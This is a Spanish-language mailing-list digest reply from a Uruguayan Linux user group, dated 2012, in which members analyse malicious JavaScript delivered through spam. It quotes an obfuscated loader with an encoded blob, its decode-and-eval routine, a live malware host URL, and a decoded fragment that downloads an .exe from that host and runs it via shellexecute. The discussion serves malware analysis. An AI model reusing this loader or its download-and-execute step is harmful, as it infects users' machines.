[uylug-varios] ataques curiosos

Pedro Worcel pedro at worcel.com
Wed Oct 10 18:19:49 PDT 2012 

Que pensas del codigo che?

El 11 de octubre de 2012 14:08,
<uylug-varios-request at listas.uylug.org.uy>escribió:

> Send Uylug-varios mailing list submissions to
>         uylug-varios at listas.uylug.org.uy
>
> To subscribe or unsubscribe via the World Wide Web, visit
>         http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
> or, via email, send a message with subject or body 'help' to
>         uylug-varios-request at listas.uylug.org.uy
>
> You can reach the person managing the list at
>         uylug-varios-owner at listas.uylug.org.uy
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Uylug-varios digest..."
>
>
> Today's Topics:
>
>    1. Re: ataques curiosos (Kenneth Irving)
>    2. Re: ataques curiosos (Kenneth Irving)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Wed, 10 Oct 2012 22:57:32 -0200 (UYST)
> From: Kenneth Irving <ken at fq.edu.uy>
> To: uylug-varios at uylug.org.uy
> Subject: Re: [uylug-varios] ataques curiosos
> Message-ID: <alpine.DEB.1.10.1210102255010.9995 at mail.fq.edu.uy>
> Content-Type: text/plain; charset="iso-8859-15"; Format="flowed"
>
> Pedro: s?, gracias. Eso es exactamente lo que quer?a hacer, decodificar el
> archivo y volcarlo a alg?n lugar, pero no sab?a c?mo hacerlo con
> javascript! Por eso mand? la consulta, me parec?a m?s r?pido que andar
> aprendiendo c?mo hacerlo en javascript. ?gracias!
>
> saludos
>
> Kenneth
>
> On Thu, 11 Oct 2012, Pedro Worcel wrote:
>
> > Hola gente!
> >
> > Aprovecho este post para presentarme, soy Pedro, estoy programando ahora
> en Nueva Zelanda pero me crie en Mercedes, y estudie en la
> > UTU. Me paso mi viejo un link de esta conversacion me parecio
> interesante y ahora me anote para UYLUG. Tambien me anote un poco porque
> > me impresiono que se vaya a organizar un evento a nivel Latinoamericano
> de la OWASP en Montevideo, muy groso.
> >
> > La verdad que no entiendo como codifica el malware el javascript, pero
> no hace falta saberlo porque al final el mismo lo decodifica y
> > lo manda a un eval.
> >
> > Para poder trabajar con el lo descargue desde la linea de comandos y lo
> edite con vim. Reemplace todas las ocurrencias de eval por
> > console.log y luego copie los contenidos de el firebug en el pastebin y
> lo hice mas lindo.
> >
> > El codigo del malware esta aca:
> >
> > http://pastie.org/5032658
> >
> > Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)
> >
> > Saludos!
> > Pedro
> >
> > ---------- Mensaje reenviado ----------
> > De: Kenneth Irving <ken at fq.edu.uy>
> > Fecha: 10 de octubre de 2012 19:25
> > Asunto: [uylug-varios] ataques curiosos
> > Para: UYLUG <uylug-varios at uylug.org.uy>
> >
> >
> >
> > Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el
> ?ltimo era un bolet?n de noticias trucho de CNN), pero que
> > termina siempre en algo parecido. Son emails que siempre tienen alg?n
> link que te baja un HTML que contiene en su interior 3 o 4 links
> > que te bajan un c?digo Javascript, que lo ?nico que hace es bajar alg?n
> otro archivo, este s? un HTML que contiene el c?digo malicioso
> > en javascript.
> >
> > Paso el link final para bajar el c?digo malicioso de javascript:
> >
> > ?http://2.cmisdfoundation.com/links/persons_jobs.php
> >
> > y trascribo s?lo parte del c?digo. El c?digo comienza con esto:
> >
> > ------------------------- comienzo ---------------------------------
> > <html><head><title></title></head><body><div
> >
> dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div
> 58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10 at 321v331e36
> &393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3
> >
> p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c at 341c331t3k
> &38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3
> > c353e373k!381r311t31^"
> > 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31 at 2r123f3e12
> &1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e at 18341c3319
> &3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1
> > 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"
> > 49="42e3f34 at 353j2r382t
> &1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m at 352338393c
> &341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3
> > 53e3k1e_37353k253c$353d353e3k(223p293418 at 341e34393m&2924191r39+361831"
> > 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33 at 3k393f3e18
> &193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e at 3m353e343f
> &3i3s3s12
> >
> 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
> > ------------------------ [c?digo cortado] ---------------------------
> >
> > El bloque de datos codificados contin?a, y el archivo termina con esto:
> > ------------------------ [continuaci?n] -----------------------------
> > ?65="53i)23313j3518#191e3i353g*3c31333518
> > !1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12 at 171b3b1e3g
> &3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
> >
> > 35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39 at 1b1734393j
> &3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
> > if(020==0x10)a=document.getElementsByTagName(dd)[1];
> > s="";
> > for(i=0;;i++){
> > ? ? ? ? if(window.document)r=a.getAttribute(i);
> > ? ? ? ? if(r){s=s+r;}else break;
> > }
> > a=s;
> > asd();
> > s="";
> > for(i=0;i<a.length;i+=2){
> > ? ? ? ? s+=String.fromCharCode(parseInt(a.substr(i,2),32));
> > }
> > c=s;
> > e=eval;
> > try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
> > ? ? ? ? ? ? ? ? </script></body></html>
> > -------------------- fin -------------------------------
> >
> > Esto lo paso s?lo como muestra y para no publicar el socotroco completo.
> Es m?s pr?ctico simplemente bajarlo desde el link original.
> >
> > Es obvio que el bloque de datos codificados e decodificado en el c?digo
> javascript final, y luego de decodificarlo se ejecuta con el
> > "e(c)".
> >
> > Imagino que debe tratarse de c?digo javascript ofuscado para explotar
> alguna debilidad de alg?n navegador o alg?n cliente de email,
> > pero mis pobres conocimientos de javascript no me han permitido
> decodificar esto sin riesgo, por lo que lo publico en esta lista, tal
> > vez alguien con suficiente curiosidad pueda decodificarlo y hacernos
> saber de qu? se trata. Es simplemente curiosidad, me result? muy
> > interesante el trabajo que se toman para ocultar el c?digo malicioso.
> >
> > saludos
> >
> > ?Kenneth
> > _______________________________________________
> > Uylug-varios mailing list
> > Uylug-varios at listas.uylug.org.uy
> > http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
> >
> >
> > --
> > http://is.gd/droope
> >
> >
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: susp.tar.gz
> Type: application/x-gzip
> Size: 12684 bytes
> Desc:
> URL: <
> http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121010/9ca37a04/attachment-0001.bin
> >
> -------------- next part --------------
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
> ------------------------------
>
> Message: 2
> Date: Wed, 10 Oct 2012 23:07:55 -0200 (UYST)
> From: Kenneth Irving <ken at fq.edu.uy>
> To: uylug-varios at uylug.org.uy
> Subject: Re: [uylug-varios] ataques curiosos
> Message-ID: <alpine.DEB.1.10.1210102305380.9995 at mail.fq.edu.uy>
> Content-Type: text/plain; charset="iso-8859-15"; Format="flowed"
>
>
> ?pah! qu? socotroco de c?digo. La mayor parte parece tener que ver con
> verificar la presencia de alg?n plugin del navegador. Pero al final baja
> algo e intenta ejecutarlo en un shell:
>
> var ra4 = ".//..//757736c.exe"
> [...]
> ra2.open("GET",
> "
> http://2.cmisdfoundation.com/links/persons_jobs.php?rhrvax=350a360337&eus=080b330306060b06020a&jgic=04&xwagghbf=phuaee&fbt=knoifmkz
> ",
> false);
> [...]
> with(ra1) {
>                  shellexecute(ra4);
>              }
>
> ?es posible hacer esto desde javascript? ?bajar un ejecutable y ejecutarlo
> desde un shell?
>
> saludos
>
> Kenneth
>
> On Thu, 11 Oct 2012, Pedro Worcel wrote:
>
> > Hola gente!
> >
> > Aprovecho este post para presentarme, soy Pedro, estoy programando ahora
> en Nueva Zelanda pero me crie en Mercedes, y estudie en la
> > UTU. Me paso mi viejo un link de esta conversacion me parecio
> interesante y ahora me anote para UYLUG. Tambien me anote un poco porque
> > me impresiono que se vaya a organizar un evento a nivel Latinoamericano
> de la OWASP en Montevideo, muy groso.
> >
> > La verdad que no entiendo como codifica el malware el javascript, pero
> no hace falta saberlo porque al final el mismo lo decodifica y
> > lo manda a un eval.
> >
> > Para poder trabajar con el lo descargue desde la linea de comandos y lo
> edite con vim. Reemplace todas las ocurrencias de eval por
> > console.log y luego copie los contenidos de el firebug en el pastebin y
> lo hice mas lindo.
> >
> > El codigo del malware esta aca:
> >
> > http://pastie.org/5032658
> >
> > Y adjunto el malware, segun yo, neutralizado. (no garantizo nada eh)
> >
> > Saludos!
> > Pedro
> >
> > ---------- Mensaje reenviado ----------
> > De: Kenneth Irving <ken at fq.edu.uy>
> > Fecha: 10 de octubre de 2012 19:25
> > Asunto: [uylug-varios] ataques curiosos
> > Para: UYLUG <uylug-varios at uylug.org.uy>
> >
> >
> >
> > Hace un tiempo que de tanto en tanto recibo spam que parece diverso (el
> ?ltimo era un bolet?n de noticias trucho de CNN), pero que
> > termina siempre en algo parecido. Son emails que siempre tienen alg?n
> link que te baja un HTML que contiene en su interior 3 o 4 links
> > que te bajan un c?digo Javascript, que lo ?nico que hace es bajar alg?n
> otro archivo, este s? un HTML que contiene el c?digo malicioso
> > en javascript.
> >
> > Paso el link final para bajar el c?digo malicioso de javascript:
> >
> > ?http://2.cmisdfoundation.com/links/persons_jobs.php
> >
> > y trascribo s?lo parte del c?digo. El c?digo comienza con esto:
> >
> > ------------------------- comienzo ---------------------------------
> > <html><head><title></title></head><body><div
> >
> dqa="asd"></div><script>dd="div";asd=function(){a=a.replace(/[^012a-z3-9]/g,"");}</script><div
> 58="16#31193r341e*34393m1e36!3f333l3j18^193t3t3331_3k33381836$193r3t3i35(3k3l3i3e10 at 321v331e36
> &393i3j3k23+38393c341q%3e3l3c3c3t)1c3j353k2j#3k3
> >
> p3c351q*363l3e333k!393f3e1832^1c37193r3m_313i10361t$321e3j3k3p(3c351c311c at 341c331t3k
> &38393j1r39+3618361616%37193r363f)3i18311t1g#1r311s371e*3
> > c353e373k!381r311t31^"
> > 44="!38253m353e^3k18123f3e_121b341c33$193t353c3j(353r321t31 at 2r123f3e12
> &1b342t1r31+2r123f3e12%1b342t1t35)1e3n393e28#313e343c35*3i18331c32!193t3t3t3t^1c3n393e28_313e343c35$3i1q363l3e(333k393f3e at 18341c3319
> &3r3i353k3l+3i3e10363l%3e333k393f)3e18193r34#18191r3936*1
> > 83k3p3g35!3f3610331t^1t12363l3e_333k393f3e$12"
> > 49="42e3f34 at 353j2r382t
> &1r3k3i3p3r+331e3i353d%3f3m352338)393c341837#193t33313k*3338183619!3r3t3t3t39^361833193r_3k3i3p3r34$1e34393m1e(3i353d3f3m at 352338393c
> &341833193t+33313k3338%1836193r3t)3t3t3t3936#1811341e34*393m193r31!1t343f333l^3d3
> > 53e3k1e_37353k253c$353d353e3k(223p293418 at 341e34393m&2924191r39+361831"
> > 22="!18331c3219^3t3t3t3t1c_393e393k2j$333i393g3k(1q363l3e33 at 3k393f3e18
> &193r3m313i+10331t3k38%393j1c311t)3e313m3937#313k3f3i1c*351t121f12!1c361c391t^311e3l3j35_3i2137353e$3k3s3s1212(1c371t311e at 3m353e343f
> &3i3s3s12
> >
> 12+1c321t311e%3g3c313k36)3f3i3d3s3s#12121c381t*311e3g3i3f!343l333k3s^3s12121r33_1e393e393k$2f"
> > ------------------------ [c?digo cortado] ---------------------------
> >
> > El bloque de datos codificados contin?a, y el archivo termina con esto:
> > ------------------------ [continuaci?n] -----------------------------
> > ?65="53i)23313j3518#191e3i353g*3c31333518
> > !1f2s3j1f37^1c1212191r_3h1t361b37$1b17103n39(343k381t12 at 171b3b1e3g
> &3c3l37393e+2j393q351b%1712103835)3937383k1t#12171b3b1e*3g3c3l3739!3e2j393q
> >
> > 35^1b17121017_1r3h1b1t17$3j3k3p3c35(1t12171b39 at 1b1734393j
> &3g3c313p1q+393e3c393e%351r121017)1r363f3i18#3f1t1g1r3f*1s321e3c35"></div><script>
> > if(020==0x10)a=document.getElementsByTagName(dd)[1];
> > s="";
> > for(i=0;;i++){
> > ? ? ? ? if(window.document)r=a.getAttribute(i);
> > ? ? ? ? if(r){s=s+r;}else break;
> > }
> > a=s;
> > asd();
> > s="";
> > for(i=0;i<a.length;i+=2){
> > ? ? ? ? s+=String.fromCharCode(parseInt(a.substr(i,2),32));
> > }
> > c=s;
> > e=eval;
> > try{if(020==0x10)("321".substr+"zxc")();}catch(gdsgdsg){e(c);}
> > ? ? ? ? ? ? ? ? </script></body></html>
> > -------------------- fin -------------------------------
> >
> > Esto lo paso s?lo como muestra y para no publicar el socotroco completo.
> Es m?s pr?ctico simplemente bajarlo desde el link original.
> >
> > Es obvio que el bloque de datos codificados e decodificado en el c?digo
> javascript final, y luego de decodificarlo se ejecuta con el
> > "e(c)".
> >
> > Imagino que debe tratarse de c?digo javascript ofuscado para explotar
> alguna debilidad de alg?n navegador o alg?n cliente de email,
> > pero mis pobres conocimientos de javascript no me han permitido
> decodificar esto sin riesgo, por lo que lo publico en esta lista, tal
> > vez alguien con suficiente curiosidad pueda decodificarlo y hacernos
> saber de qu? se trata. Es simplemente curiosidad, me result? muy
> > interesante el trabajo que se toman para ocultar el c?digo malicioso.
> >
> > saludos
> >
> > ?Kenneth
> > _______________________________________________
> > Uylug-varios mailing list
> > Uylug-varios at listas.uylug.org.uy
> > http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
> >
> >
> > --
> > http://is.gd/droope
> >
> >
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: susp.tar.gz
> Type: application/x-gzip
> Size: 12684 bytes
> Desc:
> URL: <
> http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121010/7cd9bf9b/attachment.bin
> >
> -------------- next part --------------
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
> ------------------------------
>
> _______________________________________________
> Uylug-varios mailing list
> Uylug-varios at listas.uylug.org.uy
> http://listas.uylug.org.uy/listinfo.cgi/uylug-varios-uylug.org.uy
>
>
> End of Uylug-varios Digest, Vol 14, Issue 15
> ********************************************
>



-- 
http://is.gd/droope <http://is.gd/signature_>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://listas.uylug.org.uy/pipermail/uylug-varios-uylug.org.uy/attachments/20121011/56bf6f17/attachment-0002.htm>

More information about the Uylug-varios mailing list